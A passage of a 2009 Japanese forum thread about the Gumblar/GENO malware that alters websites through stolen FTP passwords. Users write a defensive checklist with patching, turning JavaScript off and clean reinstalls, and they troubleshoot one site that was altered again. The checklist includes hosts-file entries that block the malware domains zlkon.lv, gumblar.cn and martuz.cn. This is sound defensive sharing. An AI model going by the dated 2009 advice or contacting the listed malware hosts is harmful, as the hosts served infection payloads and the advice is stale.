そりゃPC立ち上げてなくても改ざんされるさw
パス抜かれてるんだから
293:192.168.0.774
09/05/18 21:17:01 PdITwA+BO
>>279
お前は何もわかっちゃいないんだな
294:192.168.0.774
09/05/18 21:18:54 mHe74bNo0
>>293
携帯からこのスレ見るのは大変だよね
295:192.168.0.774
09/05/18 21:20:08 NyMv5pcE0
>>294
末尾0の携帯って始めて見た
296:192.168.0.774
09/05/18 21:22:05 iBPeeRKO0
>>295
294は嫌味だろw
297:192.168.0.774
09/05/18 21:23:04 ua7Ctj4Z0
>>295
>294は末尾Oの>293に対するコメントでしょ。
298:192.168.0.774
09/05/18 21:23:12 +psJy0jj0
>>283
そのほうがFirefoxを入れなくてはいけないという意味に取られなくていいね
できれば
4.使用しているブラウザのJavaScriptをオフにする。
(FirefoxならNoscript導入が便利)
かな
299:192.168.0.774
09/05/18 21:23:46 9T8t/wwO0
>>292
パス抜いた後どっかに送る→そこから改竄という事か
何となく思い込みで改竄も該当PCから裏で行うものと思ってた
300:192.168.0.774
09/05/18 21:24:53 gHdwI20D0
◇感染してるっぽい場合
OSクリーンインストール一択
◇対策
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.Adobe Acrobat Readerの JavaScript 機能OFF
4.使用しているブラウザのJavaScriptをオフにする。
(FirefoxならNoscript導入が便利)
5.Windows Updateもやっておく
6.セキュリティ対策ソフトもパターンを最新に更新
◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
PeerGuardian2を導入。もしくはhosts書き換え
ただしPG2は一部FWと競合する場合あり。
>>286 >>291
質問スレ向けのテンプレとしても考えてるから、何かいい案あったらヨロ
>>298
差し替えた
301:192.168.0.774
09/05/18 21:25:24 wU1qChfhP
>>292
収集したパスを確実に有効活用してる辺りが恐ろしい
こういう挙動を見ると>>84とか納得しやすい
302:192.168.0.774
09/05/18 21:25:43 PdITwA+BO
対策まとめなら、NoScript導入するよりFirefoxで普通にScript切るように書いた方がわかりやすいと思うんだけど
303:192.168.0.774
09/05/18 21:26:39 +psJy0jj0
>>300
ありがとう御座います
304:192.168.0.774
09/05/18 21:28:27 PdITwA+BO
ダメだ…携帯だと書き込みづらい…
レスが遅れて変な流れになるな
スマン
305:192.168.0.774
09/05/18 21:29:50 2oOT4BL40
>>300
個人的には4.のJS OFFをまず最初に持ってきたほうがいいとは思うんだが、
(手軽で効果が高いし)
少なくとも1と5の実行に必要なのが難しいな。
テンプレっぽい対策だと上から順番にやっていくだろうし。
あとはhosts書き換えもツール不要だし
詳細書いて入れておいてもいいんじゃないだろうか。
ドメイン増えてきたらまた考えたほうがいいが。
306:192.168.0.774
09/05/18 21:29:58 HJozc/wK0
>>256
その管理人さんの件ですが、検証後こちらのスレで報告してくれるとの事なので
しばらくお待ちください
307:192.168.0.774
09/05/18 21:31:20 87c9A7NGO
感染を確認⇒サーバー上のファイルを全消⇒クリーンなPCからお詫び文掲載&FTPのPASS変更⇒感染PCもフル再インストール⇒PCがクリーンであることを確認⇒接続&復旧
の段階を踏んだにもかかわらず、夜中に海外IPからFTPへのログインがあり、
htmlファイルが書き換えられていた。
現在、クリーンインストールをしたPCも、もともとクリーンだったサブPCにも感染の痕跡はない。
これって、一度存在を確認したサーバーを攻撃する特性もあるのだろうか。
308:192.168.0.774
09/05/18 21:32:01 I7+FOOqT0
思議だ・・・
このスレの>101
読み込んでもなんの反応もしなかったノートンさまが
無印スレの同じコピペに猛烈に反応してログが読み込まれなくなったww
スレリンク(news板)
なぜだぁ?
309:192.168.0.774
09/05/18 21:32:36 XTSMt63n0
>>287
キャッシュ即消しで無罪になるのは岡ちゃんぐらいだよねぇ( `・ω・)(・ω・` )ねぇ
310:192.168.0.774
09/05/18 21:33:48 KxPBQ8Is0
>>307
FTPのパス変えたのにログインされてる時点でクリーンじゃない
311:192.168.0.774
09/05/18 21:34:27 UYH62RHM0
感染サイトが書き換えられるのは書き換えロボか何かがクローラーしてて書き換えていくと
思っているのだが、その場合は今のところそいつのドメインは.cnなんだろうか?
注意しててもアンチウィルスにスルーされる亜種発生でいつ感染してもおかしくない状態なら
.htaccessで中国ドメイン弾いておけばサイトからの二次感染を少しは防げるのだろうか…
気付けば即行クリーンインストールしてサイト削除するが気付くまでの時間の二次感染を
防げるものなら防ぎたい
312:192.168.0.774
09/05/18 21:37:31 +m52NSIq0
やっぱテンプレは簡潔じゃないと見向きもされないってことが
>>283を見てよくわかったよ。
313:192.168.0.774
09/05/18 21:38:00 wU1qChfhP
>>307
さすがにそれはありないだろ。パス変更かリカバリに失敗してるとしか思えない。
314:192.168.0.774
09/05/18 21:38:37 9T8t/wwO0
>>311
自前でFTP鯖立てて囮に仕立て上げれば確認出来るんじゃね?
315:192.168.0.774
09/05/18 21:39:42 mHe74bNo0
>>311
過去ログみるとわかるが攻撃拠点をどんどん変えているから意味がない
いちおう今の拠点は防いでおいたらどうだ
316:192.168.0.774
09/05/18 21:40:24 jMF6q9vz0
>>307
>クリーンなPCからお詫び文掲載&FTPのPASS変更
順序が逆だろ
317:192.168.0.774
09/05/18 21:41:17 ua7Ctj4Z0
>>307
そら、感染状態でFTPパス変えて(その時点で抜かれてる)、それからクリーンにしても意味ないわさ。
318:192.168.0.774
09/05/18 21:42:29 gHdwI20D0
>>305
順番通りとなると、JSオフでFlashの更新て出来るっけ?
あと質問スレはPC初心者板で考えてたけど、他に適当な板があれば候補挙げてくれ。
ID出る方が便利だろうし、携帯も判別できればいいかも
319:192.168.0.774
09/05/18 21:42:42 mHe74bNo0
たしかに感染した状態でパス変えてるw 意味ねぇw
320:192.168.0.774
09/05/18 21:44:40 d802Hgw+0
ん?クリーンなPCからパス変更したんじゃなくて?
だとしたらちょっとアホとしかw
321:192.168.0.774
09/05/18 21:45:17 trO4EmPM0
>307は
感染PCの他に未感染サブPCも持ってて
FTP変更&お詫び文は未感染サブマシンの方使ったのに
また書き換えられてたってことでは?
322:192.168.0.774
09/05/18 21:45:20 uPOxfdVV0
お茶目すぎるww
323:192.168.0.774
09/05/18 21:46:07 JmCcr4Q60
>>307
順番が間違ってるな
感染を確認→感染PCをネットから切り離す→クリーンなPCでFTPパス変更、鯖上のファイル撤去、お詫び掲載→
感染PC再インストール→PCがクリーンであることを確認→接続&復旧
324:192.168.0.774
09/05/18 21:47:36 5HeIlMf90
しかし、逆に考えてみれば感染してしまったら変更後即クリーンにしても
ばっちり挙動バレてるってことだな、時間差はどれくらいだか不明だけど
恐ろしい
325:192.168.0.774
09/05/18 21:48:01 xetX1L+g0
>>311
>思っているのだが、その場合は今のところそいつのドメインは.cnなんだろうか?
そんなわけないだろw
botnet所属のゾンビにやらせてるんだと思うよ
326:192.168.0.774
09/05/18 21:49:22 2oOT4BL40
>>318
出来なかったと思うんで、
(手動でWindowsUpdateサイトにいく場合もOFFでは無理だったはず)
とりあえずはその順番が無難かも。
あとは>>251あたりを軽く弄ってhosts書き換えとIP遮断を入れるかどうかかな。
IP遮断はツール必要ならば、無理にテンプレとして書く必要はないだろうけど。
327:192.168.0.774
09/05/18 21:50:37 9T8t/wwO0
>>318
> 順番通りとなると、JSオフでFlashの更新て出来るっけ?
今確認してきたが駄目だった
まずJS→その後にActiveX実行だね
328:307
09/05/18 21:51:24 87c9A7NGO
いや、だから感染したPCは当然、感染を確認した時点で接続切ってる。
感染していないことを確認した別のPCから、パス変えてお詫び掲載してるんだってば。
じゃなきゃ聞かないよ。
クリーンインストール済みPCの挙動もおかしくないし、sqlsodbc.chmの数値も正常、hosts書き換えも対策済。
カスペルスキーのオンラインスキャンをしても感染警告も出ない。
ちなみにFTPにログインしてきたIPはばらばら。IP検索したらアメリカのものだった。
329:192.168.0.774
09/05/18 21:53:24 gHdwI20D0
>>327
じゃあ、こんな感じだな。
◇感染してるっぽい場合
OSクリーンインストール一択
◇対策
1.Windows Updateをやる
2.Adobe Flash Player の最新版にアップデート
3.Adobe Acrobat Reader の最新版にアップデート
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.使用しているブラウザのJavaScriptをオフにする。
(FirefoxならNoscript導入が便利)
6.セキュリティ対策ソフトもパターンを最新に更新
◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
PeerGuardian2を導入。もしくはhosts書き換え
ただしPG2は一部FWと競合する場合あり。
後は感染の確認方法か
330:192.168.0.774
09/05/18 21:54:37 9DcOQSDJ0
>>328
ユーザ名がばれてるから辞書アタックとかでpassばれたんじゃね
331:192.168.0.774
09/05/18 21:55:17 9T8t/wwO0
>>328
変更後のパスは簡単なもの?
簡単な奴ならあっさり破られた可能性も否定できない
332:192.168.0.774
09/05/18 21:56:05 enUpbFMt0
>>328
まさかとは思うがわかりやすい変え方してないだろうな?
333:192.168.0.774
09/05/18 21:56:28 wU1qChfhP
>>328
サーバーの方もやられてるとか
334:192.168.0.774
09/05/18 21:58:30 uNfu7V1L0
>>328
> 感染していないことを確認した別のPCから、パス変えてお詫び掲載してるんだってば。
実は新種のげのに
335:192.168.0.774
09/05/18 21:59:04 wYgtdtbN0
今北産業 しばらく見ないうちに本スレが何故か荒れていたので避難 結局どうなったの?
336:192.168.0.774
09/05/18 22:00:00 k/mLx2jO0
>>281
そうめんに塩こんぶ美味そう…。
Vistaでhosts編集これでどうよ?
C:\Windows\System32\drivers\etc\ を開く
そこにあるhostsをデスクトップにコピペする
コピペしたものをテキストエディタで開いて編集する
編集したhostsを
C:\Windows\System32\drivers\etc\に
コピペで上書きする。
いま自分のVistaで試したら出来たよ。
337:192.168.0.774
09/05/18 22:08:03 tEGQgz3YP
>327
直接取りに行くとか
URLリンク(www.adobe.com)
スタンドアローンインストーラーのダウンロード
338:192.168.0.774
09/05/18 22:08:47 eOHkXG3n0
6.zlkon-gumblarお役立ち情報 高機能サロン管理システム★さまれぼ!★開発日記
URLリンク(excomp.cocolog-nifty.com)
猛威を振るっているzlkon.lv/gumblar.cnに関する記事の中で、お役立ち情報を集めました。
他のサイトの引用やパクリではない、独自のノウハウを紹介しています。
339:192.168.0.774
09/05/18 22:09:06 ehqW54OZ0
ローカルのhtmlも書き換えられるの?
340:192.168.0.774
09/05/18 22:09:54 yaVwoLmK0
>>328
鯖はレンタル?自鯖?
FTPのアクセスエリアに何か仕込まれてるってのが強いと思うんだけど。。。
341:192.168.0.774
09/05/18 22:10:32 OKumnmfJ0
>>328
マジで?気になるね。
サーバは、どの程度の権限もってるの?
何か変なプロセス走らせられてるとか。
342:192.168.0.774
09/05/18 22:12:12 KxPBQ8Is0
感染していないことを確認した別のPCが感染していたというオチだったりな
343:192.168.0.774
09/05/18 22:13:11 Mki2Si4+0
>>287
スペイン風邪みたいなもんか
344:192.168.0.774
09/05/18 22:13:46 9T8t/wwO0
>>337
すっかり失念してた
URLリンク(www.macromedia.com)
URLリンク(www.macromedia.com)
直リンだとこれでいいのかな
正直そのページの表記は分かりにくい
345:192.168.0.774
09/05/18 22:14:22 /sQ3yN+j0
この勘違い何度も何度も見てるが
「serverとclientは別物」
対策云々結構
解析出来ないならUNIX板あたりでスレ建てなよ
さすがに妄想で広がりつつあるんで口出しさせてもらった
ちなみに俺はセキュ板にいたコボラー
逆asemとか出来ないから↑
346:192.168.0.774
09/05/18 22:14:49 OKumnmfJ0
一回FTPパス抜かれたら、サーバ側も色々やられるのかな。
HTML書き換え以外にも。
シェルを書き換えたり、cronで変なプログラム走らせたりとか…
347:192.168.0.774
09/05/18 22:16:45 buCstTcZ0
>>345
いまどきCOBOL…
…ができて逆汗できぬとはw
YOUマスターしちゃいなYO!
たぶんやったらすぐできるようになる
348:192.168.0.774
09/05/18 22:18:11 mHe74bNo0
鯖にウイルスが常駐していてクリーンPCからパス変えても
それを見ている可能性があるって事かな?
アメリカのIPさらしたら何か手がかり出てこないか?
349:192.168.0.774
09/05/18 22:20:51 byWkuqg10
>>343
言いえて妙だな
DOUJINウィルスとか新しい呼称を定着させようとしてる奴もいるっぽいけど
やっぱりGENOの初動ミス(隠蔽?)がパンデミックの原因ってのはデカい
350:192.168.0.774
09/05/18 22:21:04 oUUadTlw0
自鯖ならありえるかもしれんが
自鯖じゃなければ権限の関係で常駐はもちろんのこと
cronとか関係ないもの書き換えたりはできないだろ
351:192.168.0.774
09/05/18 22:21:19 v9Ml0IBb0
>>345
まぁそうだね。初心者向けにも対策案作るのは素晴らしい事だが
妙な解析から変は誤解広めるのはやめてほしい
>>347
どんどん煽ってくれ
逆汗でまAnubis以上のまともな結果が得られたなら、是非提示してもらおうか
352:192.168.0.774
09/05/18 22:21:31 2oOT4BL40
>>346
さすがにそういうものが実行できるようになってるとすると、
鯖側の管理問題だと思うが・・・。自鯖ならわからんけど。
353:192.168.0.774
09/05/18 22:21:36 KxPBQ8Is0
>>347
COBOLって結構使われてるよ
354:192.168.0.774
09/05/18 22:22:29 oH14GReB0
対策簡単すぎてプログラム板のおさん連中は興味ないんだろうな
355:192.168.0.774
09/05/18 22:23:55 oH14GReB0
IDかぶった
354:ID:oH14GReB0はオレ
本物のID:oH14GReB0、オレがID変えてくるからそのままでいいよ
356:192.168.0.774
09/05/18 22:24:16 TTbAOLbH0
今日は流れ早いな
他板から人流れてきたのかな
357:192.168.0.774
09/05/18 22:24:53 OKumnmfJ0
自鯖なのかレンサバなのか教えて欲しい。
cron 実行出来るレンサバならあるんじゃないかな。
で、ウイルスHTMLを、自働的に上書きするとか。
逆に、レンサバ側から接続させるとか。
358:192.168.0.774
09/05/18 22:25:21 gHdwI20D0
◇感染対象
今のところWindows 2000,XP で感染確認
◇感染してるっぽい場合
OSクリーンインストール一択
◇対策
1.Windows Updateをやる
2.使用しているブラウザのJavaScriptをオフにする。
(FirefoxならNoscript導入が便利)
3.Adobe Flash Player の最新版にアップデート
IE版 URLリンク(www.macromedia.com)
その他版 URLリンク(www.macromedia.com)
4.Adobe Acrobat Reader の最新版にアップデート
5.Adobe Acrobat Readerの JavaScript 機能OFFにする
6.セキュリティ対策ソフトもパターンを最新に更新
◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
PeerGuardian2を導入。もしくはhosts書き換え
ただしPG2は一部FWと競合する場合あり。
◇hosts書き換えの手順
C:\Windows\System32\drivers\etc\ を開く。
そこにある「hosts」というファイルをデスクトップにコピペする
コピペしたものをテキストエディタ(メモ帳でもよい)で開き、以下を最後の行にコピペ
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
終わったら保存して閉じる。
そして編集したファイルを元の場所へ上書きする。
359:192.168.0.774
09/05/18 22:26:21 wYgtdtbN0
>>354
むしろそれだけで済むからパソコン弱い人々には安心な件 亜種がちょっと心配だけど
360:192.168.0.774
09/05/18 22:27:46 buCstTcZ0
実行DLLは、文字列の難読化はあるが、パッカはかかってない
・検出
>>154
・対策
Driver32 に書き込み権限与えない
>>351 >>353
おいおい、まってくれよ 通じてないじゃん、よくみてくれ
煽りに見せかけて、逆汗やろうぜっていったんじゃねーかよw
COBOL世代なら、CPUってもんががわかるだろうよってことさ
俺のいつもいるスレに現役COBOLerがいるし、
COBOLですっきり記述できるアプリだってある
361:192.168.0.774
09/05/18 22:28:12 JmCcr4Q60
>>358
対策の所に
感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を
ってのはどうだい?
362:192.168.0.774
09/05/18 22:30:47 wU1qChfhP
つか普通の対策ってテンプレとまとめサイトで十分だろ
363:192.168.0.774
09/05/18 22:33:06 mHe74bNo0
ID:87c9A7NGOはもう寝たのだろうか
鯖は自作鯖かレンタルか
パスは簡単なものや推測しやすい単語かなのか
アクセスしてきたアメリカのIPだけでもいいから教えてくれ
364:192.168.0.774
09/05/18 22:34:31 B0vPMVyM0
hostsの書き換えって何の為にやるの?
簡単でいいから説明してよ。
365:192.168.0.774
09/05/18 22:34:40 hONTFHMO0
キャッシュのクリアの意味は?
誤検出って、何が誤検出するの?
感染後に消す意味もないけど、
観戦前に消す意味がわからない・・・
366:192.168.0.774
09/05/18 22:37:13 gHdwI20D0
>>361
◇対策 ※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を
こんな感じか
hosts書き換えは別にするかね
367:192.168.0.774
09/05/18 22:37:54 4oFiJRbxO
な、なあ、ここ見てたら、アバストさんにここ感染してるから接続切るね。ていわれたんだが。
368:192.168.0.774
09/05/18 22:38:55 yaVwoLmK0
>>364
感染後に.cnサイトへアクセスしないようにする対策。
369:192.168.0.774
09/05/18 22:39:00 wU1qChfhP
>>364
危険なドメインを無効にするため(本来の使い方は違うが)
大雑把に言えばFWと同じ効果が得られる
よく話題になるのは設定が楽だから
370:192.168.0.774
09/05/18 22:39:00 w4/ZSEyW0
しょーもない質問してるやつ全員ググレよカスが
371:192.168.0.774
09/05/18 22:39:39 8wfIRV8X0
winXP3だけど、定期的にCCleaner掛けてるせいか、sqlsodbc.chmそのものが無い。
(HDD内全部検索かけた)
cmd regedit起動問題なし。これは未感染判定でOK?
>>329
対策の「2.3.を実施するにはIEならスクリプト実行する」
オプション設定が必要と注記いるんじゃないかな。
372:192.168.0.774
09/05/18 22:40:03 BZ5+cjSr0
>>356
被害が広がっているっていう事の証じゃなければいいけどな・・・
よりにもよってNT5系が集中的に狙われるからこんな事になる。
373:307
09/05/18 22:40:41 87c9A7NGO
パスを破られた可能性か・・・
簡単にはしていないつもりだけど、もう一度PCの感染の有無を調べてからもっと複雑にしてみるよ。
だから前回の改ざんから数日の間隔があったのかもしれないし。
ちなみにサーバーはさくらのライト。
IDが変えられないから、狙いをつけられた可能性はある。
ひとつのサーバーにたくさんのユーザーが同居してるからその辺も関係あるのかも?
今は大丈夫なようなので、もう一度自分のPCを確認して、
こまめにFTPログイン履歴の様子をチェックしてみることにします。
ご教示ありがとうございました。
374:192.168.0.774
09/05/18 22:41:08 buCstTcZ0
>>365
鯖側が修復しても、閲覧側が、腐ったページデータ(のキャッシュ)を再利用したら
またおかしなファイルを拾ってきてしまうことになると
あとは、証拠隠滅と解釈しるって声が大きいが…。
375:192.168.0.774
09/05/18 22:44:01 aSrw/i390
>>373
有料のレンタルならパスバレの可能性が一番でかい気がするな
376:192.168.0.774
09/05/18 22:44:31 mHe74bNo0
>>372
セキュリティ板のやつが腐女子がいろんなところで
ウイルスに関して無意味に宣伝していると怒ってたよ
377:192.168.0.774
09/05/18 22:45:54 mIWNpElD0
mixi()笑でGENO検索すれば腐女子日記いっぱいだぜwwww
378:192.168.0.774
09/05/18 22:46:24 /c603Sfk0
>>371
同じくCClaner常用してるけど、sqlsodbc.chmはあるよ;
379:192.168.0.774
09/05/18 22:46:38 wYgtdtbN0
>>376
あら? 俺が聞いた話じゃ腐女子が無意味に逆切れして本スレ荒らしてるんじゃなかったっけ?
380:192.168.0.774
09/05/18 22:47:52 mHe74bNo0
>>379
誰に聞いたんだ?
381:192.168.0.774
09/05/18 22:48:38 hONTFHMO0
>>374
腐ったページ=ほぼ感染でしょ?
今の対応はクリンインストしかないのなら
意味がないのでは~
と思ってるんだが・・・
382:371
09/05/18 22:49:40 8wfIRV8X0
自己レス、2月にママンCPU他交換したときにnliteで統合、自分に不要な
コンポーネント、サービス削ったので無くなってる可能性大。
383:192.168.0.774
09/05/18 22:49:54 9qXYfpxvO
>>369
今の所分かってるGENOの悪さするファイルが0.0.0.0のIPアドレスにしかアクセスできなくするって解釈でいいの?
で、そもそも0.0.0.0ってIPアドレスは存在しないってことでいいのかね、初歩的な知識すら無くてすまん
384:192.168.0.774
09/05/18 22:50:45 jPv9twqC0
>>371
nlite で 削ったりしてない?
俺もない口なんだけどね。
385:192.168.0.774
09/05/18 22:51:00 wYgtdtbN0
>>380
セキュ板の現行スレより
103 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/18(月) 22:12:40
>>95
妙な敬語つかった腐女子が私達は悪くない!とよくわからんが荒らす
↓
コピペ連没
↓
運営に通報
の流れ
386:192.168.0.774
09/05/18 22:51:15 eOHkXG3n0
217 名前: カンパニュラ・ベリディフォーリア(dion軍)[] 投稿日:2009/05/18(月) 21:37:49.06 ID:VX5XUvFi
ht p://maarso.blog.shinobi.jp/
おいちょっとこのサイト踏んだら挙動おかしいんだが
ソース見た限りではおかしなところなかったんだが……
387:192.168.0.774
09/05/18 22:51:17 wU1qChfhP
>>371
大丈夫だと思う
確か感染するとsqlsodbc.chmは作られるとかどうとか
388:192.168.0.774
09/05/18 22:52:11 wbZLj6zq0
>>386
GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告
389:192.168.0.774
09/05/18 22:52:42 gHdwI20D0
◆感染対象
今のところWindows 2000,XP で感染確認
◆感染してるっぽい場合
OSクリーンインストール一択
◆対策 ※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を
1.Windows Updateをやる
2.使用しているブラウザのJavaScriptをオフにする。
(FirefoxならNoscript導入が便利)
3.Adobe Flash Player の最新版にアップデート
JSオフだと更新できないので↓のリンクからインストーラーを落として入れる
IE版 URLリンク(www.macromedia.com)
その他版 URLリンク(www.macromedia.com)
4.Adobe Acrobat Reader の最新版にアップデート
5.Adobe Acrobat Readerの JavaScript 機能OFFにする
6.セキュリティ対策ソフトもパターンを最新に更新
◆そのほか予防策
・ブラウザのキャッシュはこまめにクリアする(感染ページをPC内から完全に消す)
・危険IPのブロック(トロイの侵入を防ぐため)
PeerGuardian2を導入。もしくはhosts書き換え
ただしPG2は一部FWと競合する場合あり。
◆hosts書き換えの手順
トロイの侵入を防ぐための予防策。ただし新しい配布元が増えると追加の必要あり
C:\Windows\System32\drivers\etc\ を開く。
そこにある「hosts」というファイルをデスクトップにコピペする
コピペしたものをテキストエディタ(メモ帳でもよい)で開き、以下を最後の行にコピペ
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
終わったら保存して閉じる。
そして編集したファイルを元の場所へ上書きする。
長くなったんでスレ1に貼る場合はhosts書き換え以下を分割がいいかな
感染確認用のテンプレが面倒すぐる。